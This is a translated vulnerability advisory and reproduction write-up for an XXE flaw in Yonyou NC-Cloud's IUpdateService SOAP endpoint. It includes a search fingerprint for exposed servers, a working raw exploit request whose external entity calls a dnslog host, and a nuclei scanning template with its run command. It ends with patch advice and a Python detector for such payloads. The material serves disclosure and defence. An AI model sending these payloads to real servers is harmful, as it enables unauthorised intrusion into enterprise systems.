01 — Vulnerability name
02 — Affected scope
Yonyou NC-Cloud
03 — Vulnerability description
Yonyou NC-Cloud is a digital platform for large enterprises. It focuses on digital management, digital operations and digital commerce, helping large enterprises fully digitise people, finance, assets and customers, thereby driving business innovation and management change and, together with enterprise managers, redefining the heights of the future. The system's /uapws/service/nc.uap.oba.update.IUpdateService interface has an XXE vulnerability: an attacker can craft malicious content in the XML, which can lead to remote control of the server.
04 —
body="/Client/Uclient/UClient.exe" || body="ufida.ico" || body="nccloud" || body="/api/uclient/public/"
05 — Vulnerability reproduction
Register on a dnslog platform, for example http://dnslog.pw/dns/?&monitor=true, send the following packet to the lab target, and then check the DNS records.
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
   <soapenv:Header/>
   <soapenv:Body>
      <iup:getResult>
         <!--type: string-->
         <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
      </iup:getResult>
   </soapenv:Body>
</soapenv:Envelope>
The access record can be seen on the DNSlog platform.
Reproduction succeeded.
06 — nuclei PoC
The contents of the PoC file are as follows:
id: yonyou-nc-cloud-IUpdateService-xxe
info:
  name: 用友NC-Cloud soapFormat XXE漏洞
  author: fgz
  severity: critical
  description: 用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/service/nc.uap.oba.update.IUpdateService接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。
  metadata:
    max-request: 1
    fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
    verified: true
requests:
  - raw:
      - |-
        POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        SOAPAction: urn:getResult
        Content-Type: text/xml;charset=UTF-8
        Content-Length: 397

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
           <soapenv:Header/>
           <soapenv:Body>
              <iup:getResult>
                 <!--type: string-->
                 <iup:string><![CDATA[
        <!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://{{interactsh-url}}">%aaa;%ccc;%ddd;]>
        <xxx/>]]></iup:string>
              </iup:getResult>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
        condition: and
Run the PoC:
.\nuclei.exe -t mypoc/用友/nc-cloud/yonyou-nc-cloud-IUpdateService-xxe.yaml -l data/用友-NC-Cloud2.txt
07 — Remediation advice
The Yonyou Security Center has released a patch; please apply it promptly.
https://security.yonyou.com/#/home
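Besides applying the vendor patch, it is worth being able to recognise this request shape in captured traffic. The following is an added example for this write-up, not code from Yonyou or from the original post. It takes a SOAP body that a reverse proxy, WAF or IDS has already captured as text, scans the envelope's own prolog for a DTD, then parses the envelope and scans every text node. That second step matters here: the DTD in the PoC above sits inside a CDATA section of the iup:string parameter, so the envelope parser sees only a string, and the external entity is only resolved when the service parses that string again as XML. A check that looks at the outer document alone never sees it. The sample body is a reconstruction of the request above with the dnslog hostname replaced by a non-resolving placeholder; the Finding record, the function names and the constructed benign request are this example's own.

```python
"""Spot XXE-style DTD declarations in captured SOAP request bodies."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample: the PoC request body from the write-up, with the dnslog
# hostname replaced by a placeholder that can never resolve.
SAMPLE_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://oob.example.invalid">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>"""

# Constructed benign call to the same operation: a plain document, no DTD.
BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Body><iup:getResult><iup:string><![CDATA[<xxx/>]]></iup:string></iup:getResult></soapenv:Body>
</soapenv:Envelope>"""

CDATA_RE = re.compile(r"<!\[CDATA\[.*?\]\]>", re.S)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# Matches <!ENTITY [%] name SYSTEM "uri"> and <!ENTITY [%] name PUBLIC "id" "uri">.
EXT_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%]+)\s+"""
    r"""(?:SYSTEM\s+(?P<sys>"[^"]*"|'[^']*')"""
    r"""|PUBLIC\s+(?:"[^"]*"|'[^']*')\s+(?P<pub>"[^"]*"|'[^']*'))""",
    re.I,
)


@dataclass(frozen=True)
class Finding:
    layer: int        # 0 = the envelope itself, 1 = text carried inside it
    kind: str         # "external-entity" or "dtd"
    name: str         # entity name, "" for a bare DOCTYPE
    uri: str          # external identifier, "" when there is none
    parameter: bool   # True for %name parameter entities, as in the PoC


def scan_text(text: str, layer: int) -> list[Finding]:
    """Regex scan of one parse layer's raw text for a DTD and external entities."""
    if not DOCTYPE_RE.search(text):
        return []
    found = []
    for m in EXT_ENTITY_RE.finditer(text):
        uri = (m.group("sys") or m.group("pub")).strip("\"'")
        found.append(Finding(layer, "external-entity", m.group("name"), uri, bool(m.group("param"))))
    # A DOCTYPE with only internal entities still deserves a (lower) flag:
    # entity-expansion denial of service needs no external reference at all.
    return found or [Finding(layer, "dtd", "", "", False)]


def analyze_body(body: str) -> list[Finding]:
    """Scan the SOAP envelope and every text node the service would re-parse."""
    # Layer 0: the envelope. CDATA sections are blanked first so text hidden
    # inside them is not mistaken for the envelope's own prolog.
    findings = scan_text(CDATA_RE.sub("", body), layer=0)
    # Layer 1: the text nodes. ElementTree hands back CDATA content as plain
    # text, which is exactly the string the application's second parser gets.
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Malformed envelope: fall back to scanning the raw CDATA contents.
        for m in re.finditer(r"<!\[CDATA\[(.*?)\]\]>", body, re.S):
            findings += scan_text(m.group(1), layer=1)
        return findings
    for el in root.iter():
        for chunk in (el.text, el.tail):
            if chunk:
                findings += scan_text(chunk, layer=1)
    return findings


def is_suspicious(body: str) -> bool:
    """True when any layer declares an entity with an external identifier."""
    return any(f.kind == "external-entity" for f in analyze_body(body))


if __name__ == "__main__":
    for label, body in (("poc", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(label, is_suspicious(body), analyze_body(body))
```

Run against the reconstructed PoC body the scanner reports one layer-1 finding: a parameter entity named aaa pointing at the external URL, which is the out-of-band DNS lookup the write-up observes; the benign call produces nothing. The layer value tells an analyst whether the DTD was visible to the envelope parser or only to the application's second parse, which is useful when deciding which component needs the DTD-disabling fix.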
Originally published by the WeChat official account AI与网安: [Vulnerability reproduction] Yonyou NC-Cloud IUpdateService XML external entity injection vulnerability